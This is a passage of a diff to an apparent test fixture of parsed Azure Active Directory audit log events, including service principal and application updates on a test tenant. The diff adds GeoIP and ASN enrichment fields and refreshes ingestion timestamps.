\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -14309,6 +15209,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -14462,7 +15374,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125277700Z", + "ingested": "2021-12-14T14:48:43.176731284Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:42:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"531446ed-abd2-468f-96a8-a4dcc7b05168\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:42:45.1042022Z\"},{\"Name\":\"env_epoch\",\"Value\":\"VYXPT\"},{\"Name\":\"env_seqNum\",\"Value\":\"45826464\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR559\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"15adbe69-7974-41ec-8341-208456600ad3\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -14489,6 +15401,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -14633,7 +15557,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125282400Z", + "ingested": "2021-12-14T14:48:43.176731913Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:37\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"811fd012-35a6-4a0c-abce-79fb08b9ab6c\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:37.2045249Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34620418\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d23b201c-5436-4ecc-a789-18d3f00ea76c\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -14660,6 +15584,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -14804,7 +15740,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125287500Z", + "ingested": "2021-12-14T14:48:43.176732540Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:37\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"811fd012-35a6-4a0c-abce-79fb08b9ab6c\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:37.2045249Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34620418\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d23b201c-5436-4ecc-a789-18d3f00ea76c\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -14831,6 +15767,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -14975,7 +15923,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125291600Z", + "ingested": "2021-12-14T14:48:43.176733267Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:37\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"811fd012-35a6-4a0c-abce-79fb08b9ab6c\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:37.2045249Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34620418\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d23b201c-5436-4ecc-a789-18d3f00ea76c\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update 